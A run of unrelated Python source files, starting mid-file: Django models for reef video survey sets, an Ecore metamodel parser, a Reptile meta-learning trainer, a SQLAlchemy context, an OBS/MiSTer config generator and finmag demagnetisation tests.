order_insertion_by = ['name']
def __str__(self):
return u"{0}".format(self.name)
@classmethod
def get_choices(cls, node=None):
if node is None:
nodes = [cls.get_choices(node=node) for node in cls.objects.filter(parent=None, active=True)]
return [(node.pk, node.name) for node in flatten(nodes)]
elif node.is_leaf_node():
return node
else:
return [node] + [cls.get_choices(node=node) for node in node.get_children().filter(active=True)]
class BenthicCategory(MPTTModel):
name = models.CharField(max_length=50, unique=True)
description = models.TextField(null=True, blank=True)
active = models.BooleanField(
default=True,
help_text='overridden if parent is inactive')
parent = TreeForeignKey('self', null=True, blank=True, related_name='children', db_index=True)
class MPTTMeta:
order_insertion_by = ['name']
def __str__(self):
return u"{0}".format(self.name)
class Meta:
verbose_name_plural = 'benthic categories'
class Set(AuditableModel):
# suggested code pattern:
# [site.code][reef.code]_[set number within reef]
code = models.CharField(max_length=32, db_index=True, help_text='[site + reef code]_xxx', null=True, blank=True)
set_date = models.DateField()
coordinates = models.PointField(null=True)
latitude = models.DecimalField(max_digits=12, decimal_places=8)
longitude = models.DecimalField(max_digits=12, decimal_places=8)
drop_time = models.TimeField()
haul_date = models.DateField(null=True, blank=True)
haul_time = models.TimeField(null=True, blank=True)
depth = models.DecimalField(help_text='m', decimal_places=2, max_digits=12,
validators=[MinValueValidator(Decimal('0.01'))])
comments = models.TextField(null=True, blank=True)
message_to_annotators = models.TextField(null=True, blank=True)
tags = models.ManyToManyField(to=SetTag)
current_flow_estimated = models.CharField(max_length=50, null=True, blank=True, help_text='H, M, L')
current_flow_instrumented = models.DecimalField(null=True, blank=True,
max_digits=5, decimal_places=2,
help_text='m/s') # m/s .00
bruv_image_url = models.CharField(max_length=200, null=True, blank=True)
splendor_image_url = models.CharField(max_length=200, null=True, blank=True)
benthic_category = models.ManyToManyField(BenthicCategory, through='BenthicCategoryValue')
# new fields
substrate_relief_mean = models.DecimalField(null=True, blank=True, decimal_places=4, max_digits=12)
substrate_relief_sd = models.DecimalField(null=True, blank=True, decimal_places=4, max_digits=12)
visibility = models.CharField(db_column='visibility_str', max_length=10, null=True, blank=True, choices=VISIBILITY_CHOICES)
field_of_view = models.CharField(max_length=10, null=True, blank=True, choices=FIELD_OF_VIEW_CHOICES)
custom_field_value = JSONField(db_column='custom_fields', null=True)
# todo: need some form changes here ...
bait = models.ForeignKey(Bait, null=True)
equipment = models.ForeignKey(Equipment)
reef_habitat = models.ForeignKey(ReefHabitat, blank=True)
trip = models.ForeignKey(Trip)
drop_measure = models.OneToOneField(
EnvironmentMeasure,
on_delete=models.CASCADE,
null=True,
related_name='drop_parent_set')
haul_measure = models.OneToOneField(
EnvironmentMeasure,
on_delete=models.CASCADE,
null=True,
related_name='haul_parent_set')
video = models.OneToOneField(
Video,
on_delete=models.CASCADE,
null=True,
related_name='set'
)
bulk_loaded = models.BooleanField(default=False)
class Meta:
unique_together = ('trip', 'code')
@property
def environmentmeasure_set(self):
return [x for x in [self.haul_measure, self.drop_measure] if x is not None]
@property
def next_by_code(self):
return self.trip.get_next_set_by_code(self.code)
def save(self, *args, **kwargs):
# todo: we're assuming the input is latitude & longitude! this should be checked!
self.coordinates = Point(float(self.longitude), float(self.latitude))
if not self.code: # set code if it hasn't been set
self.code = u'{}{}_xxx'.format(self.reef().site.code, self.reef().code)
super(Set, self).save(*args, **kwargs)
self.refresh_from_db()
if self.code == u'{}{}_xxx'.format(self.reef().site.code, self.reef().code):
next_id = str(len(Set.objects.filter(trip=self.trip, reef_habitat__reef=self.reef()))).zfill(3)
self.code = self.code.replace('_xxx', u'_{}'.format(next_id))
super(Set, self).save(*args, **kwargs)
def reef(self):
return self.reef_habitat.reef
def get_absolute_url(self):
return reverse('set_update', args=[str(self.id)])
def observations(self):
if self.video:
return Observation.objects.filter(assignment__in=self.video.assignment_set.all())
def habitat_filename(self, image_type):
server_env = VersionInfo.get_server_env()
return '/{0}/{1}/{2}/{3}.png'.format(server_env,
self.trip.code,
self.code,
image_type)
# todo: "property-ize" this?
def master(self, project=1):
try:
return MasterRecord.objects.get(set=self, project_id=project)
except MasterRecord.DoesNotExist:
return None
def assignment_counts(self, project=1):
status_list = {'Total': 0}
if self.video:
status_list.update(Counter(Assignment.objects.filter(
video=self.video, project=project).values_list('status__id', flat=True)))
status_list['Total'] = sum(status_list.values())
return status_list
def required_fields(self):
# need to make this data-driven, not hard-coded field choices
# currently required:
# 1) visibility
# 2) current flow (either)
# 3) substrate
# 4) substrate complexity
return bool(self.visibility
and (self.current_flow_estimated or self.current_flow_instrumented))
def completed(self):
# we consider the following for "completion":
# 1) complete annotations have been promoted into a master
# 2) a master annotation record has been completed
# 3) other 'required' fields have been completed (see above)
master = self.master()
return master \
and (master.status.is_finished) \
and self.required_fields()
def __str__(self):
return u"{0}_{1}".format(self.trip.code, self.code)
class BenthicCategoryValue(models.Model):
set = models.ForeignKey(Set)
benthic_category = TreeForeignKey(BenthicCategory)
value = models.IntegerField()
|
'''
Created on 2015-02-16
@author: levi
'''
from xml.dom import minidom
from copy import deepcopy
from core.himesis_utils import graph_to_dot
from collections import defaultdict
class EcoreUtils(object):
'''
a set of utils to deal with ecore files
'''
def __init__(self, xmlfileName):
'''
Constructor
'''
self.debug = False
if self.debug:
print("Parsing: " + xmlfileName)
self.xmldoc = None
try:
self.xmldoc = minidom.parse(xmlfileName)
except FileNotFoundError:
raise FileNotFoundError("Metamodel file not found: " + xmlfileName + "\nWas the metamodel placed in the 'SyVOLT/eclipse_integration/metamodels/' folder?")
self.inheritanceRels = self.getSuperClassInheritanceRelationForClasses()
self.containmentRels = []
self.mmClassParents = self.getSuperClassInheritanceRelationForClasses()
self.mmClassChildren = self.getSubClassInheritanceRelationForClasses()
self.classes = []
self.rels = defaultdict(list)
self.attribs = {}
self.containmentLinks = {}
self.metamodelClasses = self.xmldoc.getElementsByTagName('eClassifiers')
# first get a dictionary with all the metamodel classes that have containment relations towards them.
# several containment relations can exist towards the same metamodel class.
# also keep a list of all containment relations in the metamodel.
debug_rels = False
debug_contain_links = False
for mmClass in self.metamodelClasses:
mmClassName = mmClass.attributes['name'].value
self.classes.append(mmClassName)
rels = mmClass.getElementsByTagName('eStructuralFeatures')
for rel in rels:
targetClassName = str(rel.attributes['eType'].value).split('#//', 1)[1]
relName = str(rel.attributes['name'].value)
isAttrib = "EAttribute" in str(rel.attributes['xsi:type'].value)
if isAttrib:
# record this attrib
if mmClassName not in self.attribs.keys():
self.attribs[mmClassName] = [relName]
else:
self.attribs[mmClassName].append(relName)
else:
relTuple = (mmClassName, relName)
if 'containment' in rel.attributes and str(rel.attributes['containment'].value) == "true":
if targetClassName not in self.containmentLinks.keys():
self.containmentLinks[targetClassName] = [relTuple]
else:
if rel not in self.containmentLinks[targetClassName]:
self.containmentLinks[targetClassName].append(relTuple)
self.containmentRels.append(relName)
#record this relation
if relTuple not in self.rels[targetClassName]:
self.rels[targetClassName].append(relTuple)
if debug_rels:
print("\nLinks:")
for k, v in sorted(self.rels.items()):
print(str(k) + ":" + str(v))
if debug_contain_links:
print("\nContain links:")
for k, v in sorted(self.containmentLinks.items()):
print(str(k) + ":" + str(v))
#raise Exception()
def getMetamodelClassNames(self):
'''
Get a list with all the names of the classes in the ecore metamodel file.
Discard duplicates.
TODO: For the time being does not care about inheritance relations.
'''
classNameList = self.xmldoc.getElementsByTagName('eClassifiers')
return [str(item.attributes['name'].value) for item in classNameList]
def getMetamodelContainmentLinks(self):
'''
Get all the containment links in a metamodel.
'''
containmentLinkList = self.xmldoc.getElementsByTagName('eStructuralFeatures')
containmentReferences = []
for element in containmentLinkList:
try:
if element.attributes.item(4).value == "true":
containmentReferences.append(str(element.attributes['name'].value))
except Exception:
pass
return containmentReferences
def buildContainmentDependenciesForClass(self, targetClass):
'''
auxiliary, build all containment relations for a class, recursively
'''
metamodelClasses = self.xmldoc.getElementsByTagName('eClassifiers')
res = []
for sourceClass in metamodelClasses:
rels = sourceClass.getElementsByTagName('eStructuralFeatures')
containmentRels = []
for rel in rels:
try:
if str(rel.attributes['containment'].value) == "true":
containmentRels.append(rel)
except Exception:
pass
for cRel in containmentRels:
trgtClassName = str(cRel.attributes['eType'].value).split('#//', 1)[1]
srcClassName = str(sourceClass.attributes['name'].value)
# do not consider self loops in the containment classes, because they do not help with reaching the root
# TODO: containment loops could involve more than one class (e.g. A contains B contains C contains A). This case is not yet treated.
if trgtClassName == str(targetClass.attributes['name'].value) and not (trgtClassName == srcClassName):
#return [str(cRel.attributes['name'].value)].extend(self.buildContainmentDependenciesForClass(sourceClass))
res.extend([(srcClassName, str(cRel.attributes['name'].value), trgtClassName)])
res.extend(self.buildContainmentDependenciesForClass(sourceClass))
return res
def getContainmentLinksForClasses(self):
'''
get all containment relations for the classes in the metamodel
'''
allContainmentRels = {}
metamodelClasses = self.xmldoc.getElementsByTagName('eClassifiers')
for mmClass in metamodelClasses:
allContainmentRels[str(mmClass.attributes['name'].value)] = self.buildContainmentDependenciesForClass(mmClass)
# now add to the existing containment relations for a class the containment relations of its supertypes
containmentRelsWithSuper = {}
for mmClassName in allContainmentRels.keys():
containmentRelsToAdd = []
if mmClassName in self.inheritanceRels.keys():
for superTypeName in self.inheritanceRels[mmClassName]:
if superTypeName in allContainmentRels.keys():
for containmentLink in allContainmentRels[superTypeName]:
containmentRelsToAdd.append((containmentLink[0], containmentLink[1], mmClassName))
res = allContainmentRels[mmClassName]
res.extend(containmentRelsToAdd)
containmentRelsWithSuper[mmClassName] = list(set(res))
return containmentRelsWithSuper
def buildInheritanceDependenciesForClass(self, mmClassNames):
'''
build a list of all parents of the given class
'''
metamodelClasses = self.xmldoc.getElementsByTagName('eClassifiers')
mmClassesToTreat = []
for mmClass in metamodelClasses:
for mmClassName in mmClassNames:
if mmClassName == str(mmClass.attributes['name'].value):
mmClassesToTreat.append(mmClass)
break
parentNames = []
for mmClass in mmClassesToTreat:
superTypeNames = []
try:
superTypeNames = str(mmClass.attributes['eSuperTypes'].value)
superTypeNames = superTypeNames.replace(" ", "")
superTypeNames = superTypeNames[3:]
superTypeNames = superTypeNames.split('#//')
except Exception:
pass
# parentClass = None
# for mmClass2 in metamodelClasses:
# if str(mmClass.attributes['name'].value) == superTypeName:
# parentClass = mmClass2
parentNames.extend(superTypeNames)
if parentNames:
parentNames.extend(self.buildInheritanceDependenciesForClass(parentNames))
return list(set(parentNames))
def getSuperClassInheritanceRelationForClasses(self):
'''
build a dictionary where the key is the name of the metamodel class and the
value is the list of parents of that class
'''
inheritanceRel = {}
metamodelClasses = self.xmldoc.getElementsByTagName('eClassifiers')
for mmClass in metamodelClasses:
superTypeNames = []
try:
superTypeNames = str(mmClass.attributes['eSuperTypes'].value)
superTypeNames = superTypeNames.replace(" ", "")
superTypeNames = superTypeNames[3:]
superTypeNames = superTypeNames.split('#//')
except Exception:
pass
if superTypeNames != []:
superTypeNames.extend(self.buildInheritanceDependenciesForClass(superTypeNames))
inheritanceRel[str(mmClass.attributes['name'].value)] = superTypeNames
else:
inheritanceRel[str(mmClass.attributes['name'].value)] = []
return inheritanceRel
def getSubClassInheritanceRelationForClasses(self):
'''
build a dictionary where the key is the name of the metamodel class and the
value is the list of children of that class
'''
subClasses = {}
superClasses = self.getSuperClassInheritanceRelationForClasses()
for childClassName in superClasses.keys():
for parentClassName in superClasses[childClassName]:
if parentClassName not in subClasses.keys():
subClasses[parentClassName] = [childClassName]
else:
subClasses[parentClassName].append(childClassName)
return subClasses
def inheritsFrom(self, subtype, supertype):
'''
quick and dirty method to check whether a class inherits from another
'''
if subtype == supertype: return True
if subtype in self.inheritanceRels:
if supertype in self.inheritanceRels[subtype]:
return True
return False
def getBuiltClasses(self, pathCond):
classesInOuputMM = self.getMetamodelClassNames()
classesBuiltByPC = []
for node in range(len(pathCond.vs)):
if pathCond.vs[node]["mm__"] in classesInOuputMM:
instanceIsProduced = True
inputClassNodes = pathCond.neighbors(pathCond.vs[node],1)
for inputClassNode in inputClassNodes:
if pathCond.vs[inputClassNode]["mm__"] == "backward_link":
instanceIsProduced = False
break
if instanceIsProduced:
classesBuiltByPC.append(pathCond.vs[node]["mm__"])
return classesBuiltByPC
def getBuiltContainmentLinks(self, rule):
'''
return all the containment relations built by a rule, in the form of a
dictionary having as key the name of the target classes and as elements a list
with the containment relation(s).
'''
containmentRelsInRule = {}
# now check which relations in the rule are built by which containment relation
mms = rule.vs["mm__"]
attr1s = rule.vs["attr1"]
for node in range(rule.vcount()):
# if rule.vs[node]["mm__"] == "directLink_T":
# print("................ Containment link: " + rule.vs[node]["attr1"])
# print("................ self.containmentRels: " + str(self.containmentRels))
if mms[node] == "directLink_T" and attr1s[node] in self.containmentRels:
# find the types of the source and the target elements of the containment in the rule
neighbours_out = rule.neighbors(node, 1)
neighbours_in = rule.neighbors(node, 2)
targetClassName = mms[neighbours_out[0]]
sourceClassName = mms[neighbours_in[0]]
link = (sourceClassName, attr1s[node])
try:
if link not in containmentRelsInRule[targetClassName]:
containmentRelsInRule[targetClassName].append(link)
except KeyError:
containmentRelsInRule[targetClassName] = [link]
return containmentRelsInRule
def getMissingContainmentLinks(self, rule):
'''
return all missing containment relations in a rule, in the form of a
dictionary having as key the targetClass and as data the containmentLinks that
can be used to build the missing containment link.
'''
debug = False
# if "HExitPoint2BProcDefWhetherOrNotExitPtHasOutgoingTrans" in rule.name or "3R0" in rule.name:
# debug = True
# print("\nExamining: " + rule.name)
if debug:
print("===========================")
print("Examining: " + rule.name)
missingContainmentLinks = {}
try:
mms = rule.vs["mm__"]
except KeyError:
return {}
#print("Rule Name: " + pathCond.name)
for node in range(len(mms)):
targetClassName = mms[node]
if targetClassName in ["trace_link", "MatchModel", "ApplyModel", "paired_with", "directLink_S", "directlink_T"]:
continue
class_inheri = [targetClassName]
try:
class_inheri += self.mmClassParents[targetClassName]
except KeyError:
pass
has_links = False
for cl in class_inheri:
if cl in self.containmentLinks.keys():
has_links = True
if not has_links:
continue
if debug:
print("\nTarget Class: " + targetClassName)
skip_match_nodes = False
neighbours_in = rule.neighbors(node, 2)
for n in neighbours_in:
if mms[n] in ["MatchModel", "match_contains"]:
skip_match_nodes = True
break
if skip_match_nodes:
continue
for cl in class_inheri:
if cl in self.containmentLinks:
if debug:
print("\tClassname: " + str(cl) + ":")
for containLink in self.containmentLinks[cl]:
if debug:
print("\t\t" + str(containLink))
try:
if containLink not in missingContainmentLinks[targetClassName]:
missingContainmentLinks[targetClassName].append(containLink)
except KeyError:
missingContainmentLinks[targetClassName] = [containLink]
if debug:
if len(missingContainmentLinks) > 0:
print("Missing containment links:")
for link in missingContainmentLinks:
print(link + " : " + str(missingContainmentLinks[link]))
#raise Exception()
return missingContainmentLinks
if __name__ == '__main__':
from ATLTrans.HUnionMotherRule import HUnionMotherRule
pathCond = HUnionMotherRule()
t1 = EcoreUtils("../UMLRT2Kiltera_MM/metamodels/rt_new.ecore")
# t1 = EcoreUtils("../eclipse_integration/examples/families_to_persons/metamodels/Community.ecore")
# t1 = EcoreUtils("./mbeddr2C_MM/ecore_metamodels/Module.ecore")
# r1 = t1.getMetamodelContainmentLinks()
# r2 = t2.getMetamodelContainmentLinks()
# print(r1)
# print(r2)
# print(str(t1.buildInheritanceDependenciesForClass(["IN1"])))
# print (str(t1.mmClassContained))
|
"""
Supervised Reptile learning and evaluation on arbitrary
datasets.
"""
import random
import tensorflow as tf
import numpy as np
from variables import (interpolate_vars, average_vars, subtract_vars, add_vars, scale_vars,
VariableState)
class Reptile:
"""
A meta-learning session.
Reptile can operate in two evaluation modes: normal
and transductive. In transductive mode, information is
allowed to leak between test samples via BatchNorm.
Typically, MAML is used in a transductive manner.
"""
def __init__(self, session, graph, variables=None, transductive=False, pre_step_op=None):
self.session = session
# variable state creates placeholders for each variables and assign ops
# lets you restore and export variables
self._model_state = VariableState(self.session, graph, variables or tf.trainable_variables())
global_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
self._full_state = VariableState(self.session, graph, global_vars)
self._transductive = transductive
self._pre_step_op = pre_step_op
# pylint: disable=R0913,R0914
# TODO: main need to modify for few shot learning to account for imitation version of num_classes / num_shots
# num_classes (num tasks to sample per outter loop), num_shots (num demonstrations per task)
def train_step(self,
dataset,
state_ph,
obs_ph,
label_ph,
minimize_op,
loss_op,
writer,
num_classes,
num_shots,
inner_batch_size,
inner_iters,
step,
meta_step_size,
meta_batch_size):
"""
Perform a Reptile training step.
Args:
dataset: a sequence of data classes, where each data
class has a sample(n) method.
input_ph: placeholder for a batch of samples.
label_ph: placeholder for a batch of labels.
minimize_op: TensorFlow Op to minimize a loss on the
batch specified by input_ph and label_ph.
num_classes: number of data classes to sample.
num_shots: number of examples per data class.
inner_batch_size: batch size for every inner-loop
training iteration.
inner_iters: number of inner-loop iterations.
meta_step_size: interpolation coefficient.
meta_batch_size: how many inner-loops to run.
"""
old_vars = self._model_state.export_variables()
new_vars = []
losses = []
print('taking train step')
for _ in range(meta_batch_size):
# sample n classes and k+1 examples from each class
# k*n for training and 1*n for testing
mini_dataset = _sample_mini_dataset_mil(dataset, num_classes, num_shots)
# for each task in the mini_dataset
for batch in _mini_batches(mini_dataset, inner_batch_size, inner_iters):
gifs = np.concatenate([t[0] for t in batch], axis=0)
states = np.concatenate([t[1] for t in batch], axis=0)
actions = np.concatenate([t[2] for t in batch], axis=0)
if self._pre_step_op:
self.session.run(self._pre_step_op)
# take a gradient step
feed_dict = {state_ph: states, obs_ph : gifs, label_ph: actions}
print('taking gradient step')
_, loss = self.session.run([minimize_op, loss_op], feed_dict=feed_dict)
print('took graident step on loss:', loss)
losses.append(loss)
# store the new variables
new_vars.append(self._model_state.export_variables())
self._model_state.import_variables(old_vars)
# update old variables
new_vars = average_vars(new_vars)
self._model_state.import_variables(interpolate_vars(old_vars, new_vars, meta_step_size))
# add loss summary
summary = tf.Summary()
print('ave loss:', np.mean(losses))
summary.value.add(tag='ave_loss', simple_value=np.mean(losses))
writer.add_summary(summary, step)
def evaluate(self,
dataset, # (train_example, test_example)
state_ph,
obs_ph,
label_ph,
minimize_op,
predictions, # not using predictions for now
num_classes,
num_shots,
inner_batch_size,
inner_iters):
"""
Run a single evaluation of the model.
Samples a few-shot learning task and measures
performance.
Args:
dataset: a sequence of data classes, where each data
class has a sample(n) method.
input_ph: placeholder for a batch of samples.
label_ph: placeholder for a batch of labels.
minimize_op: TensorFlow Op to minimize a loss on the
batch specified by input_ph and label_ph.
predictions: a Tensor of integer label predictions.
num_classes: number of data classes to sample.
num_shots: number of examples per data class.
inner_batch_size: batch size for every inner-loop
training iteration.
inner_iters: number of inner-loop iterations.
Returns:
The number of correctly predicted samples.
This always ranges from 0 to num_classes.
"""
# get train and test split, assuming that test is always one example from each class
# we know that we only use two examples so ignore this
#train_set, test_set = _split_train_test(
# _sample_mini_dataset(dataset, num_classes, num_shots+1))
train_example, test_example = dataset
statea, obsa, actiona = train_example
train_feed_dict = {
state_ph : statea,
obs_ph : obsa,
label_ph : actiona
}
#print('statea:', statea.shape, 'obsa:', obsa.shape, 'actiona:', actiona.shape)
stateb, obsb = test_example
test_feed_dict = {
state_ph : stateb,
obs_ph : obsb
}
#print('stateb:', stateb.shape, 'obsb:', obsb.shape)
# save model variables for update
old_vars = self._full_state.export_variables()
# removed for reptile
#for batch in _mini_batches(train_set, inner_batch_size, inner_iters):
# inputs, labels = zip(*batch)
for i in range(inner_iters):
if self._pre_step_op:
self.session.run(self._pre_step_op)
self.session.run(minimize_op, feed_dict=train_feed_dict)
# compute predicted values for the newly trained model
# TODO: should the data be passed in together for some reason?
# test_preds = self._test_predictions(train_set, test_set, input_ph, predictions)
# num_correct = sum([pred == sample[1] for pred, sample in zip(test_preds, test_set)])
# try non-transductive procedure
if self._transductive == False: # there appears to be a very small difference when using this option
all_state, all_obs = np.concatenate([statea, stateb], axis=0), np.concatenate([obsa, obsb], axis=0)
action = self.session.run(predictions, feed_dict={state_ph : all_state, obs_ph : all_obs})
action = action[-1]
else:
action = self.session.run(predictions, feed_dict=test_feed_dict)
# reset back to the old variables for the next evaluation
self._full_state.import_variables(old_vars)
#return num_correct
return action
# TODO: figure out if we should evaluate transductively
def _test_predictions(self, train_set, test_set, input_ph, predictions):
if self._transductive:
inputs, _ = zip(*test_set)
return self.session.run(predictions, feed_dict={input_ph: inputs})
res = []
for test_sample in test_set:
inputs, _ = zip(*train_set)
inputs += (test_sample[0],) # this passes in the training set and the test set?
res.append(self.session.run(predictions, feed_dict={input_ph: inputs})[-1])
return res
class FOML(Reptile):
"""
A basic implementation of "first-order MAML" (FOML).
FOML is similar to Reptile, except that you use the
gradient from the last mini-batch as the update
direction.
There are two ways to sample batches for FOML.
By default, FOML samples batches just like Reptile,
meaning that the final mini-batch may overlap with
the previous mini-batches.
Alternatively, if tail_shots is specified, then a
separate mini-batch is used for the final step.
This final mini-batch is guaranteed not to overlap
with the training mini-batches.
"""
def __init__(self, tail_shots=None, *args, **kwargs):
"""
Create a first-order MAML session.
Args:
args: args for Reptile.
tail_shots: if specified, this is the number of
examples per class to reserve for the final
mini-batch.
kwargs: kwargs for Reptile.
"""
super(FOML, self).__init__(*args, **kwargs)
self.tail_shots = tail_shots
# pylint: disable=R0913,R0914
def train_step(self,
dataset,
input_ph,
label_ph,
minimize_op,
num_classes,
num_shots,
inner_batch_size,
inner_iters,
meta_step_size,
meta_batch_size):
old_vars = self._model_state.export_variables()
updates = []
for _ in range(meta_batch_size):
mini_dataset = _sample_mini_dataset(dataset, num_classes, num_shots)
for batch in self._mini_batches(mini_dataset, inner_batch_size, inner_iters):
inputs, labels = zip(*batch)
last_backup = self._model_state.export_variables()
if self._pre_step_op:
self.session.run(self._pre_step_op)
self.session.run(minimize_op, feed_dict={input_ph: inputs, label_ph: labels})
updates.append(subtract_vars(self._model_state.export_variables(), last_backup))
self._model_state.import_variables(old_vars)
update = average_vars(updates)
self._model_state.import_variables(add_vars(old_vars, scale_vars(update, meta_step_size)))
def _mini_batches(self, mini_dataset, inner_batch_size, inner_iters):
"""
Generate inner-loop mini-batches for the task.
"""
if self.tail_shots is None:
for value in _mini_batches(mini_dataset, inner_batch_size, inner_iters):
yield value
return
train, tail = _split_train_test(mini_dataset, test_shots=self.tail_shots)
for batch in _mini_batches(train, inner_batch_size, inner_iters - 1):
yield batch
yield tail
def _sample_mini_dataset_mil(dataset, num_classes, num_shots):
"""
Sample a few shot task from a dataset.
Returns:
An iterable of (input, label) pairs.
"""
shuffled = list(dataset)
random.shuffle(shuffled)
for class_idx, class_obj in enumerate(shuffled[:num_classes]):
gifs, states, actions = class_obj.sample(num_shots)
for shot_idx in range(num_shots):
start_idx, end_idx = shot_idx*class_obj.T, (shot_idx + 1)*class_obj.T
g, s, a = gifs[start_idx:end_idx], states[start_idx:end_idx], actions[start_idx:end_idx]
yield (g, s, a)
def _sample_mini_dataset(dataset, num_classes, num_shots):
"""
Sample a few shot task from a dataset.
Returns:
An iterable of (input, label) pairs.
"""
shuffled = list(dataset)
random.shuffle(shuffled)
for class_idx, class_obj in enumerate(shuffled[:num_classes]):
for sample in class_obj.sample(num_shots):
yield (sample, class_idx)
def _mini_batches(samples, batch_size, num_batches):
"""
Generate mini-batches from some data.
Returns:
An iterable of sequences of (input, label) pairs,
where each sequence is a mini-batch.
"""
cur_batch = []
samples = list(samples)
batch_count = 0
while True:
random.shuffle(samples)
for sample in samples:
cur_batch.append(sample)
if len(cur_batch) < batch_size:
continue
yield cur_batch
cur_batch = []
batch_count += 1
if batch_count == num_batches:
return
def _split_train_test(samples, test_shots=1):
"""
Split a few-shot task into a train and a test set.
Args:
samples: an iterable of (input, label) pairs.
test_shots: the number of examples per class in the
test set.
Returns:
A tuple (train, test), where train and test are
sequences of (input, label) pairs.
"""
train_set = list(samples)
test_set = []
labels = set(item[1] for item in train_set)
for _ in range(test_shots):
for label in labels:
for i, item in enumerate(train_set):
if item[1] == label:
del train_set[i]
test_set.append(item)
break
if len(test_set) < len(labels) * test_shots:
raise IndexError('not enough examples of each class for test set')
return train_set, test_set
|
from contextlib import contextmanager
from sqlalchemy.engine import create_engine
from sqlalchemy.orm import Session
from pydas_metadata.contexts.base import BaseContext, session_factory
class MemoryContext(BaseContext):
"""
Memory connection context, handles data store session setup and object insertion.
This context supports both the SQLite database and in-memory metadata storage.
Example
-------
>>> from pydas_metadata.models import Base
>>> from pydas_metadata.contexts import MemoryContext
>>> context = MemoryContext()
>>> Base.metadata.create_all(context.engine)
In this example we create an in-memory data context, which is useful when you do not need to
persist the data, or when the data is already persisted elsewhere. Once the context is
created, it's passed to the `Base.metadata.create_all(context.engine)` function, which
initializes the in-memory database.
Example
-------
>>> from pydas_metadata.contexts import MemoryContext
>>> from pydas_metadata.models import Company
>>> context = MemoryContext(database='metadata.sqlite')
>>> session = context.get_session()
>>> for company in session.query(Company).all():
... print(company.symbol)
In this example, we connect to a SQLite database, query all
:class:`pydas_metadata.models.Company` objects, and print each company's symbol.
"""
def __init__(self, **config):
connection_path = (config['database']
if 'database' in config
else ':memory:')
self.engine = create_engine(f'sqlite:///{connection_path}')
session_factory.configure(bind=self.engine)
@classmethod
def can_handle(cls, context_type: str) -> bool:
return context_type == 'sqlite'
@contextmanager
def get_session(self):
"""Returns a Session factory object for connecting to the database"""
try:
session: Session = session_factory()
yield session
session.commit()
except:
session.rollback()
raise
finally:
session.close()
|
import json
import os
config_file = 'config.json'
config = {}
def create_config():
config = {}
main = {}
main["mister_ip"] = "000.000.00.000"
main["mister_username"] = "root"
main["mister_password"] = "1"
main["change_scenes"] = True
main["debug"] = False
main["custom_text_sources"] = { "GameName": "Playing {game} on {core}" }
main["refresh_rate"] = "1"
main["core_storage"] = "fat"
main["pause_scenes"] = [ "Pause Scene" ]
config["main"] = main
obs = {}
obs['host'] = "localhost"
obs['port'] = "4444"
obs['password'] = ""
config["obs"] = obs
with open(config_file, "w") as write_file:
json.dump(config, write_file, indent=4)
def load_config():
global config
if os.path.exists(config_file):
with open(config_file) as config_text:
config = json.load(config_text)
else:
print("Creating config. Update new conif with proper details")
create_config()
def get_config():
return config
load_config()
if __name__ == "__main__":
print(get_config())
|
import dolfin as df
import numpy as np
from math import pi
from finmag.util.meshes import sphere
from fk_demag import FKDemagDG as FKDemag
from finmag.util.consts import mu0
radius = 1.0
maxh = 0.2
unit_length = 1e-9
volume = 4 * pi * (radius * unit_length) ** 3 / 3
def setup_demag_sphere(Ms):
mesh = sphere(r=radius, maxh=maxh)
S3 = df.VectorFunctionSpace(mesh, "DG", 0)
m = df.Function(S3)
m.assign(df.Constant((1, 0, 0)))
demag = FKDemag()
demag.setup(S3, m, Ms, unit_length)
return demag
def test_interaction_accepts_name():
"""
Check that the interaction accepts a 'name' argument and has a 'name' attribute.
"""
demag = FKDemag(name='MyDemag')
assert hasattr(demag, 'name')
def test_demag_field_for_uniformly_magnetised_sphere():
demag = setup_demag_sphere(Ms=1)
H = demag.compute_field().reshape((3, -1))
H_expected = np.array([-1.0 / 3.0, 0.0, 0.0])
print "Got demagnetising field H =\n{}.\nExpected mean H = {}.".format(
H, H_expected)
TOL = 8e-3
diff = np.max(np.abs(H - H_expected[:, np.newaxis]), axis=1)
print "Maximum difference to expected result per axis is {}. Comparing to limit {}.".format(diff, TOL)
assert np.max(diff) < TOL
TOL = 12e-3
spread = np.abs(H.max(axis=1) - H.min(axis=1))
print "The values spread {} per axis. Comparing to limit {}.".format(spread, TOL)
assert np.max(spread) < TOL
def test_demag_energy_for_uniformly_magnetised_sphere():
Ms = 800e3
demag = setup_demag_sphere(Ms)
E = demag.compute_energy()
E_expected = (1.0 / 6.0) * mu0 * Ms ** 2 * volume # -mu0/2 Integral H * M with H = - M / 3
print "Got E = {}. Expected E = {}.".format(E, E_expected)
REL_TOL = 3e-2
rel_diff = abs(E - E_expected) / abs(E_expected)
print "Relative difference is {:.3g}%. Comparing to limit {:.3g}%.".format(
100 * rel_diff, 100 * REL_TOL)
assert rel_diff < REL_TOL
def test_energy_density_for_uniformly_magnetised_sphere():
Ms = 800e3
demag = setup_demag_sphere(Ms)
rho = demag.energy_density()
E_expected = (1.0 / 6.0) * mu0 * Ms**2 * volume # -mu0/2 Integral H * M with H = - M / 3
rho_expected = E_expected / volume
print "Got mean rho = {:.3e}. Expected rho = {:.3e}.".format(np.mean(rho), rho_expected)
REL_TOL = 1.8e-2
rel_diff = np.max(np.abs(rho - rho_expected)) / abs(rho_expected)
print "Maximum relative difference = {:.3g}%. Comparing to limit {:.3g}%.".format(
100 * rel_diff, 100 * REL_TOL)
assert rel_diff < REL_TOL
def test_energy_density_for_uniformly_magnetised_sphere_as_function():
Ms = 800e3
demag = setup_demag_sphere(Ms)
rho = demag.energy_density_function()
print "Probing the energy density at the center of the sphere."
rho_center = rho([0.0, 0.0, 0.0])
E_expected = (1.0 / 6.0) * mu0 * Ms**2 * volume # -mu0/2 Integral H * M with H = - M / 3
rho_expected = E_expected / volume
print "Got rho = {:.3e}. Expected rho = {:.3e}.".format(rho_center, rho_expected)
REL_TOL = 1.3e-2
rel_diff = np.max(np.abs(rho_center - rho_expected)) / abs(rho_expected)
print "Maximum relative difference = {:.3g}%. Comparing to limit {:.3g}%.".format(
100 * rel_diff, 100 * REL_TOL)
assert rel_diff < REL_TOL
def test_regression_Ms_numpy_type():
mesh = sphere(r=radius, maxh=maxh)
S3 = df.VectorFunctionSpace(mesh, "DG", 0)
m = df.Function(S3)
m.assign(df.Constant((1, 0, 0)))
Ms = np.sqrt(6.0 / mu0) # math.sqrt(6.0 / mu0) would work
demag = FKDemag()
demag.setup(S3, m, Ms, unit_length) # this used to fail
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
